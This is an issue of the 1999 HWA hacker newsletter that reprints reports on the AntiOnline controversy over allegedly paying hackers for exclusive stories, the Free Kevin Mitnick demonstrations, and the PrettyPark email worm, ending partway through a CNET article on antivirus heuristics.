#include main() { printf ("Read commented source!\n\n"); /*Well several problems kept me from producing the newsletter for the last couple if *weeks so this is a 'make-up' release covering June 6th-26th 1999. Some areas may *have been glossed over in order to keep the issue down in size,we'll be back to *"normal" (whatever that is) next week... meanwhile have fun. * *Issue #22 June6th-26th * *BTW The reason ZDNet articles are not reprinted here is because they are using some *funky method to defeat cutting and pasting of their text using framesets and shit if *anyone knows a way to grab the text (source doesn't work either for some sites) let *me know and i'll be most thankful... Cruci. * */ printf ("EoF.\n"); } Congrats, thanks, articles, news submissions and kudos to us at the main address: hwa@press.usmc.net complaints and all nastygrams and mailbombs can go to /dev/nul nukes, synfloods and papasmurfs to 127.0.0.1, private mail to cruciphux@dok.org danke. C*:. @HWA 03.0 AntiOnline Crosses the Line ~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 7th 1999 From HNN http://www.hackernews.com/ contributed by whoever After garnering intense media coverage (CNN, C|NET, WIRED, etc.) over his extremely early reporting of the MOD and gH attacks, John Vranesevich of AntiOnline has used that spotlight to further his own agenda. Now he has admitted to nurturing a hatred of hacking and the underground as a whole and at the same time aiding and abetting criminal acts, "Many times, I knew about these instances before hand, and could have stopped them." AntiOnline Statement A Change In Our Mission An AntiOnline Editorial Friday , June 04 1999 In the past, a hacker was an individual who literally had to spend years to learn the inner workings of computer technology, programming, and hardware. Only then could he begin to explore possible vulnerabilities, and develop, for himself, ways to exploit those vulnerabilities, and more importantly, ways to patch them. Through out these years of learning, the hacker would develop a certain respect for the technology that he was studying, and a certain level of maturity would inherently develop as well. Now, in present day society, with point and click utilities abound, a younger, less mature, less knowledgeable, and less respectful, generation of "hackers" have come to life. That's a quote from an editorial that I wrote in September of last year. Now, only 7 months later, we've seen things get even worse. When I started AntiOnline 5 years ago, it was a way for me to share with others the fascinating things that I myself was learning. The wonders of technology, how it could be used as a tool, how it could be used as an incredible way to learn, meet new people, and indeed, make the world a smaller and more understanding place. Since then, AntiOnline has grown to levels I never dreamed possible. I'm fortunate enough to be working full time on the site, I have my own office, equipment, and T1 line. The resources I have at my disposal are still small and modest, but I've come a long way from where I was a year ago, running AntiOnline out of my parent's living room. Unfortunately, I've found myself looking in the mirror with disgust these past few months. Looking back, I've seen myself talking with people who have broken into hundreds of governmental servers, stolen sensitive data from military sites, broken into atomic research centers, and yes, people who have even attempted to sell data to individuals that presented themselves as being foreign terrorists. I've seen people change the medical records of individuals in our armed services, and delete the work of tens of thousands of people that resided on large ISPs. Many times, I knew about these instances before hand, and could have stopped them. I felt at the time, that I was serving a larger good by simply writing up information that I knew about these instances, and posting them on AntiOnline for the world to read about. I felt that the incidents would be learning experiences, and that they would help technology to evolve, even if it was only in some small way. To me, the important thing was not telling the world the "who", but the "why" and the "how". I tried to stand in an invisible realm between the hacker culture, and main stream society. A realm which I now see does not exist. Looking back, I see those years as being not beneficial to anyone but myself. Those years acted as an educational experience for me. A time for me to learn about the "mechanics of the gun", but more importantly, a time for me to learn about the "people that pull the trigger". In the past 7 months, I have seen things go from bad to worse. Incidents are becoming more frequent and more serious. To some degree, things are in a state of anarchy. I now feel that I am in a position to help serve, even if in some very small way, the better good. A little note to the Federal and Military Authorities that read this site: I feel that I have been lax in my duties as a citizen to some degree. But, little known to the rest of the world, I have been working behind the scenes to change that. For the past few months, we've been working with an Air Force contractor to help them develop the "profile of a hacker". AntiOnline, as an organization, plans on taking that to an even higher level as the months progress. Several of you have already signed up for access to our knowledge base, including individuals from: The US Congress, The DISA, The Air Force, The Navy, and several police and computer forensics organizations. You will be given access information within the next week. A note to these organizations as a whole. I know that often times my exact position and role has been confusing. Let it be confusing no more. I hope that over the next few months, the level of trust between my organization and yours can continue to grow, and I hope that AntiOnline becomes a valuable tool in the fight against "CyberCrime". Now, a little note to the thousands of hackers that read this site: You yell and scream about freedom of speech, yet you destroy sites which have information that disagree with your own opinions. You yell and scream about privacy, yet you install trojans into other's systems, and read their personal e-mail and files. You truly are hypocrites. All of these grand manifestos that you develop are little more than excuses that you make up to justify your actions to yourself. Actions which you know are wrong. Actions which do not serve anyones interests but your own. Let me just say, that you've had free reign over things this past year or so. I know that some of you are playing what you feel is a game. A game that you think you are winning. Some of you sit back and laugh at organizations like the FBI. You make sure that you provide enough information to make it obvious who you are, yet are careful not to provide enough information to actually have it proven. I have been watching you these past 5 years. I know how you do the things you do, why you do the things you do, and I know who you are. Yours In CyberSpace, John Vranesevich Founder, AntiOnline As a side note, AntiOnline will be taking no press inquiries into this matter. Questions regarding this change in policy will not be answered by phone. Send all questions or comments to jp@antionline.com -=- A special report has now been released that details the close ties that John Vranesevich of AntiOnline has with the evil doers of the underground. This report claims that John Vranesevich actually paid individuals who later broke into web sites and then gave him 'exclusive' reports. This report is highly suggested reading for any journalist or reporter who has ever questioned Mr. Vranesevich about anything. It is also suggested that 'customers' of the AntiOnline Knowledge Base read this report and be familiar as to the type of person that is supplying this information. And finally any law enforcement officer who is investigating the whitehouse.gov or any other MOD cracks should absolutely read this report. AntiOnline Crosses the Line http://www.attrition.org/negation/special/ (Go here for full links and info) AntiOnline crosses the Line 6.7.99 INTRO: John Vranesevich is the founder of AntiOnline [www.antionline.com]. During the past five years, AO has grown from a five megabyte hobby web site, into a multi domain business venture with hundreds of thousands of dollars in venture capital. AntiOnline now claims to be the number one security resource on Internet. Despite this growth and development, AntiOnline has been under continual fire from critics and friends alike. Serious questions have been raised to the methods of reporting, staff background, journalistic integrity and business practice. Since AntiOnline has become a commercial entity (02-22-99), the site has released 67 pieces (some news articles, some 'specials'). Of these, 12 have been found to contain serious errata. So of the 'reporting' that AntiOnline has conducted, close to 20% has been inaccurate. Recently, information has come to light that suggests a far more serious agenda exists at AntiOnline. In the past, AntiOnline had two incidents that brought them into the spotlight, and put them on a journalistic pedestal so to speak. The first was centered around two teenagers in Cloverdale CA, and one adult in Israel that was known as "Analyzer". AntiOnline got the scoop that these three (and others) were responsible for compromising hundreds of military and government servers. Through repeated interviews and communication, AntiOnline managed to hype up these attacks which lead to them being described as "the most organized and systematic attack the Pentagon has seen to date." A short while later, it was discovered that this threat was nothing more than a group of mostly teenagers breaking into low security machines.(1) The second spotlight shone on AntiOnline after several exclusive stories and interviews with a group calling themselves "The Masters of Downloading". AntiOnline reported that the members of this group were responsible for compromising hundreds of "high security" Department of Defense computer systems, and stealing files they said were "obtained from the classified Defense Information System Network." Interviews between AntiOnline and the cracker said "I think international terrorist groups would be interested in the data we could gain access to.." Media outlets such as ZDNet unknowingly drew comparisons in the two stories. ZDnet said in one article(2) "The alleged hack - which follows a highly publicized attack on Pentagon computers by an Israeli hacker known as the "Analyzer" and his associates -- would be a major escalation of "informational warfare" on government computers." From all appearances, AntiOnline was single handedly responsible for a significant amount of the media sensationalism. Not only had AntiOnline driven the media hype behind the stories, they put various government and DOD organizations on full alert preparing for the fallout these attacks would cause. There is new information coming to light suggests that AntiOnline had a more integral part in the generation of their news. That the typical journalist/contact relationship did not exist, and in fact, AntiOnline may have been responsible for creating some of the news to report on. With these recent allegations coming to light, the ATTRITION staff and several associates set out to find out the details and foundations of the assertions. OUR GOAL: To prove Masters of Downloading (MOD, headed by a hacker named so1o) was paid by John Vranesevich/AntiOnline to hack www.senate.gov or another high profile site in order for AntiOnline to break major news. To further establish that AntiOnline employs active and potentially malicious hackers. REQUIREMENT: To prove this, we must first prove several points. allegation evidence ---------- -------- so1o is on Antionline payroll proof.1 (Email) so1o == Chris McNab proof.2 (Email) so1o is an MOD member proof.3 (Comparison of MOD/CZ hacks) proof.5 (IRC chat with so1o) AO reported on it first proof.4 (AntiOnline reports) ADDITIONAL: On June 3rd, 1999, John Vranesevich released an editorial titled "State of the Union". This piece calls into question the true relationship between Mr. Vranesevich and Chris McNab (a.k.a. so1o). The relevant text and concern it raises, coupled with the time of this editorial and subsequent information presents a more damning argument. On June 4th, 1999, John Vranesevich released a more dramatic and disturbing editorial titled A Change in Our Mission. To most of his readers, this was no doubt surprising, but expected. For a smaller group of us, the timing of this article suggests much more. On the afternoon of June 3rd, an individual questioned Mr. Vranesevich about his ties to so1o. When challenged, Vranesevich begins to deny his involvement with McNab. This denial comes after mail explicitly stating he WAS funding McNab, and after working with McNab on an AntiOnline "exclusive" on the MOD hacks. The following log and comments illustrate the denial and further backs our goal. CONCLUSION: One would hope that high ethical standards are above the law and are in effect with ANY media outlet. It seems that isn't true. Not only has AntiOnline descended into the realm of unethical journalism and business practice, they have done it while thumbing their nose at the Internet. As if they can commit these practices with impunity, John Vranesevich taunts "Well, it would take a lot more than an act of congress to get AntiOnline shut down =) I could always ship the site off to England ;-) That's another good thing about the Internet. The laws of one land don't hold true in them all ;-)". This was written as a reply to one comment in the AntiOnline mailbag on 7-13-98. As if this is not bad enough, Vranesevich has recently gone on to admit to some of his deeds. In a "change of mission statement" released on 6.4.99, he goes on to say "Many times, I knew about these instances before hand, and could have stopped them." The information presented above is more than adequate proof that John Vranesevich is funding an active hacker to break into high profile sites. The motivation for this is to increase the awareness and therefore the profitability of his web site AntiOnline. He pays people to break into sites in order to report on it as an 'exclusive'. Folks.. 1 + 1 still = 2. Direct comments or questions to: staff (staff@attrition.org) * Any instance of [snip...] is strictly removing unrelated material. Anything relevant to our argument or anything that would affect our allegations were left. What we do is no different than what JP does to his 'mailbag'. Except we leave in material that would possibly weaken our argument. His mailbag gets clipped to include only the material he wants to deal with. * Permission from Bronc and Ken was given to include the email here. @HWA 03.1 More Questions Raised about John Vranesevich and AntiOnline ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 7th from HNN http://www.hackernews.com contributed by Bronc Buster The rhetoric continues. Did he or didn't he? John Vranesevich has posted a rebuttal to the original attrition.org report that claimed he funded crack attempts. The rebuttal is more of a personal attack than a response to the allegations. Wired Online and Telepolis have written articles that try to shed some light on the situation. Bronc Buster has written an open letter to John Vranesevich that asks some very pointed questions. Questions that I think everyone would like an answer to. Attrition Report on John Vranesevich http://www.attrition.org/negation/special/ John Vranesevich Rebuttal http://www.antionline.com/cgi-bin/News?type=antionline&date=06-07-1999&story=brian.news Wired Online http://www.wired.com/news/news/culture/story/20062.html Telepolis- German http://www.heise.de/tp/deutsch/inhalt/te/2921/1.html Open letter from Bronc Buster http://www.hackernews.com/orig/broncjplet.html The Wired article and JP and Bronc's letters follow: Wired; Hacker Pundits Squabble by Polly Sprenger 12:15 p.m. 7.Jun.99.PDT A Web site addressing computer hacking issues has accused a computer security pundit of paying individuals to break into Web servers in exchange for exclusive coverage of the stories that result. John P. Vranesevich, editor of computer security magazine and resource center AntiOnline, denies the charges. Vranesevich is well known in the hacking and cracking community. He is often called on by news media, including Wired News, to provide perspective on Web site break-ins, viruses, and other security issues. A report by the group Attrition.org, released Monday, accuses Vranesevich of paying hackers to break into sites, thus guaranteeing him an exclusive on the stories. "We've never paid for a story," Vranesevich said. "We don't even pay our reporters for stories. [The allegations] are flat-out libelous and there's no proof to it. It's an attempt to destroy, defame, and discredit me." Vranesevich's detractors were already inflamed over his recent apparent shift in allegiance. On Friday, Vranesevich posted an editorial on his Web site that stated he was working with the Air Force and other government agencies to help track down crackers. "A little note to the thousands of hackers that read this site," Vranesevich warned, "I have been watching you these past five years. I know how you do the things you do, why you do the things you do, and I know who you are." His warnings have stirred the ire of attrition.org, led by Brian Martin (who goes by the name Jericho). Martin said he has been following Vranesevich's case for more than a year. Martin based his claims on two emails that allegedly show Vranesevich had a business relationship with "So1o," the hacker accused of breaking into senate.gov last year. Vranesevich said the emails displayed on Martin's site "never existed." Another chronicler of the computer security underground said that Vranesevich's reputation is less than pristine. "He has made a lot of enemies over the years," said Space Rogue, editor of the Hacker News Network. "This particular accusation has been unproven for awhile. It's been thought that this has been going on for some time, that he was paying people or was in league with them." Space Rogue cited one particular revelation in Vranesevich's Friday statement. "Many times, I knew about these instances [site hacks] beforehand, and could have stopped them," Vranesevich wrote. "That basically for me solidifies everything in the attrition report," Space Rogue said. Vranesevich said that he has never been popular with the underground hacker culture because of what he's done to expose it. "I often say that they hack a site first and make up a manifesto second," Vranesevich said. He points to his press citations in recent weeks, which include mentions in The New York Times, ABC News, and CNN. He also said that government agencies such as NASA rely on him to provide data on hacker profiles. But while Martin accuses Vranesevich of using his fame as a platform to prosperity, Vranesevich says he doesn't charge those agencies for access to data and will probably keep the information free of charge forever. "I think my track record speaks for itself," Vranesevich said. "I'm proud of how I've accomplished and what I've accomplished." JP's rebuttal AntiOnline Responds To Allegations Monday, June 7, 1999 at 11:51:56 by John Vranesevich - Founder of AntiOnline First off, for those of you that haven't read it, Brian Martin's Attrition website has today posted allegations that AntiOnline funded the Whitehouse.gov and Senate.gov hack so that we would have news to cover (However, I'm sure most of you have read it by now, because of organizations, and I use the term loosely, like the Hacker News Network). Needless to say, when I went forward with the statement that AntiOnline was going to help in the fight against malicious hackers, I expected some backlash from the hacker community. A few dozen extra hack attempts a day, some synfloods. Maybe I'd find myself with a $10,000 phone bill. But, they've apparently chosen something far more creative. First off, let me say this. Brian Martin (aka Cult_Hero) was raided by the FBI in connection with being a suspected member of the HFG (The group that hacked the New York Times), and Erik Ginorio (BroncBuster) is known, and admits, to breaking into dozens of sites (he calls himself a hacktivist). The fact that these two could think, or at least think up, some grandiose scheme which involved AntiOnline bankrolling hackers, is not surprising. They have both lived their lives trying to break, and evade, the law. For some reason, Brian Martin has become obsessed over AntiOnline. His website has dozens and dozens of pages of what he calls "errata" that he's written about it. He takes information posted on our site out of context, then criticizes us because of it. Many people have written in asking why we never posted any response to all of the allegations he has on his site about us. Personally, it's because I felt that I didn't need to justify myself, or my actions, to someone who is currently under FBI investigation, and who has never done anything for the security scene other than criticize others. I actually feel bad for him. The fact that he spends such a large portion of his life trying to "bring down" others using lies, deceit, and twistings of the truth, is sad in my eyes. As for these allegations that I paid people to break into government sites so that I could write a story. Let me just say, that such claims are so far fetched and preposterous, I'm not even going to respond to them on a point by point basis. It seems that almost all of the criticisms that I receive from people like Brian Martin revolve around money. He says in his "allegations" about AntiOnline that "During the past five years, AO has grown from a five megabyte hobby web site, into a multi domain business venture with hundreds of thousands of dollars in venture capital." Is that what he's so upset about? That I've made a ton of money? Well, let me put his mind at ease. The point in fact, is that I don't now, nor have I ever in my life, had a lot of money. Our venture funding wasn't in the amount of hundreds of thousands of dollars. I am not ashamed to say, and in fact, I'm very proud to say, that our original funding was in the amount of $75,000. I am very proud of the levels I have taken AntiOnline to with very little resources, and a lot of hard work. On average, I put in 17 hour days working on the site and related matters. At the age of 20, I'm trying to build a life long career for myself. So, to people like Mr. Martin, let me just say that anything my site has accomplished has not, and truly couldn't have been, from me throwing money at it. It came from my love for what I do, and my willingness to put in the time it takes to accomplish my dream. In a way, I take these allegations that have come against me as a sign that I'm on the right track with what I'm doing. If people like Brian Martin weren't yelling and screaming about me, I guess I'd take that as a sign that I'm off the beaten path. If people like Brian Martin didn't see me as a threat to them, they wouldn't be yelling. So, I'm going to view these recent allegations as a job well done letter from the malicious hackers of the world. I have always lived my life in a way which I was proud of, and I will continue to do so. I will NOT allow people like Brian Martin and Erik Ginorio to cause me to constantly be taking some sort of sick defensive on my site (Which is probably what their intentions are). That's not its purpose. So, if they come out with some new allegation, like I have secrets plans to assasinate the president with a herf gun or something, you won't find a response to them from me here. As a matter of fact, you won't find a response from me at all. I will let the work that I put forth, and the actions that I take in my daily life, be my response. Yours In CyberSpace, John Vranesevich Founder, AntiOnline Bronc's open letter; An open letter to John Vransevich (aka JP) 07 Jun 1999 from: Bronc Buster bronc@2600.com subject: in regards to the allegations at http://www.attrition.org/negation/special John Vransevich (aka JP), The staff of Attrition.org, a few other individuals, and I have been working over the last few weeks to peice togeather a complex web of clues. These clues were leading us to something we have suspected for a while; something that could tarnish the entire hacker community. What if someone, a reporter, was funding a known criminal to commit crimes so that they might have an inside scoop on the story? Not only would this be unethical, but illegal, and dangerous for us all. Several people have been asking how Antionline.com (AO) has had such an inside scoop on breaking stories, before anyone else regarding big hacks that you have reported on. We have begun to make a theory, based upon facts as to how we think this is happening. Here are a few simple YES or NO questions regarding these allegations and their impact.. 1) Because you had reported, in the past, the exclusive reports and interviews on how Masters of Downloading (MoD) had hacked(?) DISA and were alledged to have taken software off their server, it is obvious you knew who the person was who had comitted this crime. His handle is so1o (aka Chris McNab). You have admitted to this openly. Knowing this, you then started funding a company ran by Chris McNab to make some sort of security program. This you have also openly admitted to. Now Chris McNab, by your own admittance, comitted the crime of breaking into several Government servers and ultimatly defacing www.senate.gov. If you were funding this person, and you knew he was a criminal, not only who has comitted crimes in the past you knew about, but had crimes, such as the senate.gov hack, planned out that you knew about before hand, and he then gave you an exclusive on the story because he was getting money from you (regardless if he still is), doesn't this, in your mind, equal a totaly unethical, not to mention illegal, way to get a story? 2) On your site, you openly admit to prior knowledge of crimes that were comitted that you may or may not have reported on. This is illegal. Do you think this fact, combined with the fact that you, in some fashion, were supplying a known criminal (Chris McNab) with money is an ethical way to run your site/business? 3) In your response to the revealed allegations againt you, you posted on your site, there was no link provided (to attrition.org) so that anyone interested, who may see this on your site but not know about the allegations, to see both sides of the story and come to their own conclusions. Attirtion.org posted many links to your site, so that people could see both sides. Sense you posted a response, don't you think it isn't fair to your readers, to at least let them judge for themselves this matter? 4) Do you think that by making personal attacks against the people behind these allegations, and against the sites that are covering it, that the serious issues raised have been answered or at least addressed? 5) Do you in any way feel obligated to provide any answers to: a) The people making these allegations? b) Your readers and supporters? c) The hacking/security community in general? 6) Last but not least. Do you think anything positive can be gained by the hacking community by your actions in these matters? I personally think that your response to the criminal charges against you was childish and immature at best, and this matter warrents a serious reply. Slinging mud, and voicing your opinion about people is no way to counter facts. These are felonies, and invlove not only local, but federal laws. This is a serious matter, and like so many of the poor kids you cover who get busted, it appears you will not take it seriously until you too have been arrested and charged. Bronc Buster bronc@2600.com June 9th , a statement from OSAII Admissions Mike Hudack Editor-in-Chief The same day that a Wired News article about the Attrition special report accusing AntiOnline of unethical and even criminal practices came out, I spoke with John Vranesevich on the phone. The Wired News article quoted Vrasenevich (JP) specifically denying the existance of two e-mails which were used as evidence in the Attrition article. JP said the e-mails "never existed," according to Polly Strenger, author of the Wired News article. In my discussion with JP, however, he said "I was quoted out of context in those e-mails." I queried him further, asking him whether those e-mails really existed. He said "the e-mails existed but I was quoted totally out of context -- what I said was in jest." In a conversation hours later, however, he quickly backtracked, saying the e-mails were "manufactured, possibly from several e-mails." He said they were his words in the sense that "words taken from two pages in a book and made to look like a paragraph are the authors words. They´re still manufactured." This obvious contradiction between what I was being told the first time and what he had told Wired News wasn´t the end of it however. He went on to warn me not to "write articles against individuals or other sites. It doesn´t help your relationship with the mainstream -- I learned that the hard way." This statement was obviously a warning not to say anything about our conversation. He went on in his contradictions, however. In the Wired News article, JP is quoted as saying that the allegations against him are "flat-out libelous." In the telephone conversation, however, JP admitted that "the allegations weren´t really libelous. If anything they were borderline." He did say, however, that it was up to his "lawyer as to whether to pursue legal action." The clear dicotomy between his earlier statements to Wired News and his statements to me wasn´t the most fascinating issue, however. What was much more fascinating, as Polly Strenger said was "why didn´t he just say he was quoted out of context? That would have made a lot more sense." Later, in an open letter to JP, Bronc Buster called JP´s response to the allegations "childish" for attacking the individuals raising the allegations and not the allegations themselves. In his reponse, JP not once mentions that he was quoted out of context. Rather, he accuses Jericho and Modify (two authors of the allegations) of being subjects of an FBI investigation. He not once addresses the allegations being levelled against AntiOnline and himself. OSAll carefully weighed whether to come forward with JP´s statements, and has decided that it has an ethical obligation to do so. Any questions about this coverage, its fairness or OSAll´s relationship with either Attrition.org or AntiOnline.com should be directed to the editor, who can be contacted at editor@aviary-mag.com or by phone at 203-335-7100. @HWA 04.0 The Difficulties of Reporting the Underground ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 7th 1999 From HNN http://www.hackernews.com/ contributed by Space Rogue In light of all the media attention that hackers have gotten over the last few weeks it is apparent that most reporters and journalists are having a difficult time in accurately reporting the computer underground. While no one is claiming that it is easy, HNN editor Space Rogue takes a look at some of the more common pitfalls in this new Buffer Overflow article. Buffer Overflow http://www.hackernews.com/orig/buffero.html 05.0 Mitnick Demonstrations Deemed a Huge Success ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 7th 1999 From HNN http://www.hackernews.com/ contributed by Freaky, phar, and Silicon Monk Last Friday at 2pm in front of federal courthouses in over 16 cities people who could no longer sit down while excessive punishment was dealt by an overreaching government, gathered together to protest the large number of injustices perpetrated during the trial of Kevin Mitnick. At the demonstrations in Philadelphia a large paper mache Liberty Bell was displayed. Reba Mitnick, Kevin's grandmother was present at her local demonstration. In New York a skywriter wrote FREE KEVIN over Central Park and in San Francisco low flying airplanes carried FREE KEVIN banners. FREE KEVIN http://www.freekevin.com Mitnick Demonstartions - Pictures Here http://www.2600.net/demo/ CNN http://cnn.com/TECH/computing/9906/04/BC-INTERNET-HACKERS.reut/index.html Wired http://www.wired.com/news/news/politics/story/20053.html ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2270517,00.html Salon http://www.salon.com/tech/log/1999/06/04/mitnick/index.html Wired; Pro-Mitnick Demos in US, Russia by Polly Sprenger 3:00 a.m. 5.Jun.99.PDT In 15 American cities and Moscow, demonstrators staged protests Friday against the continued imprisonment of Kevin Mitnick, jailed after pleading guilty to seven counts of wire and computer fraud. "Just don't call him a 'celebrity cracker,'" growled Macki, the Webmaster for 2600, the hacker group and magazine that organized the events. Armed with yellow "Free Kevin" stickers and flyers describing Mitnick's case, Macki and nearly 20 other Mitnick supporters battled the miserable San Francisco wind to fight for the cause. "We're getting the word out to the worldwide and national consciousness about [Mitnick's] sentencing," said Marc Powell, a pink-haired member of the local hacker collective New Hack City. Clad in an "I [Heart] Feds" T-shirt, Powell said that although his own cyber-tomfoolery has been strictly within the law, he sympathized with Mitnick's imprisonment. As far as protests go, Mitnick's demonstration was relatively low-key. The attendees cheered as a low-flying airplane went by trailing a banner that said "Free Kevin Mitnick -- www.freekevin.com," but after seven or eight more passes, the enthusiasm waned. Some in the group had followed Mitnick's plight from the beginning, but others were just there to be part of an anti-government staging. Robin, a self-proclaimed anarchist and network administrator with a partially shaved head and a plethora of piercings, said he was in attendance because it was a strike back at the government. But others, like Perry McNulty, said Mitnick was a study in civil rights. "It's not just a hacker in jail," said McNulty, who has followed Mitnick's case for about a year. "A lot of civil rights have been violated. It could happen to any one of us." Salon Kevin Mitnick supporters plan rallies - - - - - - - - - - - - BY KAITLIN QUISTGAARD June 4, 1999 | Since his 1995 arrest for wire and computer fraud, famed hacker Kevin Mitnick has been behind bars. In March a judge sentenced him to a 46-month prison term after he pleaded guilty to a handful of the 25 charges filed against him. But on Friday, demonstrators in 15 U.S. cities and Moscow plan to protest what they see as the unjust treatment of Mitnick and ask for his parole to a halfway house. "The guy's been in there for something like four years and four months," says Emmanuel Goldstein, editor of "2600: the Hacker Quarterly." (Actually, 2600's Kevin Mitnick Lockdown Clock put it at exactly 4 years, 3 months, 16 days, 11 hours, 19 minutes and 41 seconds at that moment, but who's counting?) It's a heavy sentence for just looking at other people's software, says Goldstein: "The federal government is using him to send a message." "Even if Kevin were guilty of everything he was charged with," the 2600 site says, "the fact remains that there was no documented damage, no evidence of malicious activity, and nothing to suggest that Mitnick profited in any way by reading the software he is accused of accessing." The journal says it has uncovered letters showing that companies like Sun Microsystems and Nokia have claimed a combined total of $300 million in damages resulting from Mitnick's hacks. "This is a case of corporate vengeance, aided and abetted by a federal government seeking to intimidate hackers," the 2600 site argues. "We think Kevin Mitnick's suffering has gone on way too long." 2600 is encouraging demonstrators to meet at federal courthouses across the country and the U.S. Embassy in Moscow. The protest will coincide with the monthly 2600 meeting, which brings hackers together in various cities on the first Friday of the month. ("That way the people who spy on us have to spread themselves thin," says Goldstein, explaining the same-time, multiple-locations approach.) On June 14 a judge will formally sentence Mitnick and determine the damages he owes. The hacker group hopes to influence the court to go lightly on Mitnick. "The judge has the opportunity to sentence him to a halfway house," says Goldstein, "which is a whole lot better than a prison with murderers and rapists." salon.com | June 4, 1999 - - - - - - - - - - - - About the writer Kaitlin Quistgaard is an associate editor for Salon Technology. @HWA 06.0 New Trojan/Virus, PrettyPark ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 7th 1999 From HNN http://www.hackernews.com/ contributed by nvirB A new virus/trojan, PrettyPark arrives as an email attachment and then resends itself to users listed in the windows address book, it may possibly repeat this as often as every 30 seconds. It also attempts to log into IRC channels to deposit information. Opinions vary as to threat level of this new virus. At last report it had only been seen in France. MSNBC http://www.msnbc.com/news/276805.asp ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2270411,00.html MSNBC PrettyPark: Part worm, part Trojan Anti-virus companies unearth worm/Trojan that reportedly e-mails PC’s Windows Address Book every 30 seconds By Joel Deane and Michael Fitzgerald ZDNN June 4 — Anti-virus companies said Friday that W32/PrettyPark, a new e-mail worm program with Trojan horse characteristics, poses a potentially high risk to Internet users on Windows-based systems. Weigh in on PrettyPark New Back Orifice-like Trojan found CIH virus set to strike again Melissa spawns more offspring E-mailed wolves in sheep's clothing ALTHOUGH ASSESSMENTS OF PRETTYPARK’S capabilities vary, and damage reports are sketchy, anti-virus firms advised Friday that users update their anti-virus programs to guard against the worm/Trojan, which was discovered as early as May 12. Anti-virus company Panda Software said PrettyPark, which is also known as Pretty Worm, reaches users’ computers as an attached file in an e-mail message, just like the Melissa virus. Once executed, PrettyPark installs itself in the infected system, then sends messages with an attached copy of itself to addresses listed in the Windows Address Book. PrettyPark hits Windows users hard Panda said PrettyPark attempts to connect to an Internet relay chat server from a list of 13 possible servers, then send a message to a chat user — enabling the author of the virus to gather data on and monitor affected workstations. PrettyPark can then be manipulated as a Trojan horse, Panda said, to obtain data such as the list of available disks and confidential information such as logins and Internet connection passwords. Panda Software U.S. executive director Pedro Bustamante said Friday his company had replicated the “potentially high risk” worm/Trojan in its European anti-virus lab. “It could potentially be very high risk,” Bustamante said. “The interesting thing about this new Trojan is that, unlike Melissa, it doesn’t send itself once; it sends itself every 30 seconds.” Trend/Micro, Symantec and Network Associates reported Friday that they have been unable to duplicate PrettyPark. In a virus alert, Network Associates said PrettyPark was low risk. Trend/Micro director of technology Dan Schrader said the anti-virus company’s customers reported PrettyPark’s auto-spamming, but “can’t confirm the auto-spamming function.” “We’ve seen 40 incidents in the last 48 hours. All the incidents so far have been in France,” said Schrader, adding that PrettyPark was similar to the notorious Happy 99 executable that struck earlier this year. Schrader said PrettyPark has the potential to spread widely — if it can in fact automatically send itself to everyone in a user’s address book. But, because Trend/Micro has been unable to replicate this auto-spam capability, and because it so far seems to be centered in France, Trend/Micro suspects that someone may have spread it by hand. Symantec, Trend/Micro, Panda and Network Solutions have all posted anti-virus updates to cover PrettyPark. Luke Reiter of CyberCrime contributed to this report. @HWA 06.1 The rampage continues ~~~~~~~~~~~~~~~~~~~~~ June 8th 1999 From HNN http://www.hackernews.com/ PrettyPark Continues its Rampage contributed by nvirb PrettyPark the latest virus/trojan/worm is quickly spreading around the world. The virus arrives as an email attachment. Then after it is executed it hides behind a screen saver to mail out copies of itself and to connect to an IRC channel. In a quote given to MSNBC, Steve Trilling of Symantec said, "This virus took months to write, and its creator put a great deal of effort into it." MSNBC PrettyPark hits Windows users hard Victims of e-mail virus increase 2,000 percent over the weekend, Symantec reports By Shauna Sampson, ZDTV ZDNN June 7 — PrettyPark, a French e-mail virus, got a tremendous boost from home PC users this weekend. Anti-virus software maker Symantec said it has observed an increase of 2,000 percent in apparent victims since Friday. THESE VICTIMS OF THE VIRUS, which is being described as a worm with Trojan capabilities, are likely Microsoft Windows users who are being sent to a custom Internet relay chat channel without their knowledge. Once there, victims’ personal data — ranging from e-mail address book lists, operating system preferences and registration numbers, passwords, and form data (including stored credit card information) — can be potentially retrieved from the victim’s PC without their knowledge by the virus writer. PrettyPark is the first known worm with Trojan capabilities and its very own custom IRC channel. “This virus took months to write, and its creator put a great deal of effort into it,” says Steve Trilling of Symantec. Consumers are being hit harder by the virus because they are less likely to update their anti-virus software than large companies or businesses and are more likely to open and run executables sent by what appears to be family or friends. Malicious ‘worm’ spreading in e-mail The virus is spread when PC users open an attached e-mail program file named “PrettyPark.EXE”. When executed, it may display the Windows 3D pipe screen saver while it creates and sends duplicate files of itself to e-mail addresses listed in the user’s Internet address book. PrettyPark will run this routine every 30 seconds, without the user’s knowledge. It will also connect to the custom IRC channel while the PC owner is on the Internet or reading e-mail while connected to a remote server. So far only Windows-based systems seem to be vulnerable, the virus is definitely spreading and anti-virus software manufacturers are expecting to see more victims in the IRC chat rooms. In order to protect themselves from PrettyPark and other viruses, PC users should update their anti-virus software and avoid opening e-mail attachments. Researchers are trying to determine if other e-mail programs, such as Eudora and Lotus Notes, are vulnerable, presently the Mac and Linux operating systems do not seem to be affected. In a related story C|Net takes a look at the technology behind the Anti-Virus products available today. C|Net http://www.news.com/News/Item/0,4,37458,00.html Battling the unknown virus By Tim Clark Staff Writer, CNET News.com June 7, 1999, 1:35 p.m. PT Antivirus software makers are recycling some old tricks to combat computer viruses proliferating over the Internet. The technique, called "heuristics," checks for suspicious commands within software code to detect potential viruses. Heuristic techniques can detect new viruses never seen before, so they can keep malicious code from spreading. An older method, called signature-scanning, uses specific pieces of code to identify viruses. Both methods have down sides. Heuristic techniques can trigger false alarms that flag virus-free code as suspicious. Signature-scanning requires that a user be infected by a virus before an antivirus researcher can create a patch--and the virus can spread in the meantime. Most antivirus vendors use both techniques. "It's time for the industry as a whole to look at different approaches," said Roger Thompson, technical director of malicious code research at ICSA, a for-profit trade group for computer security vendors. "The time-honored method of signature scanning is a little worn and weary given new viruses coming out." Aladdin Knowledge Systems, which just added heuristics-based technology to its line of antivirus technology, 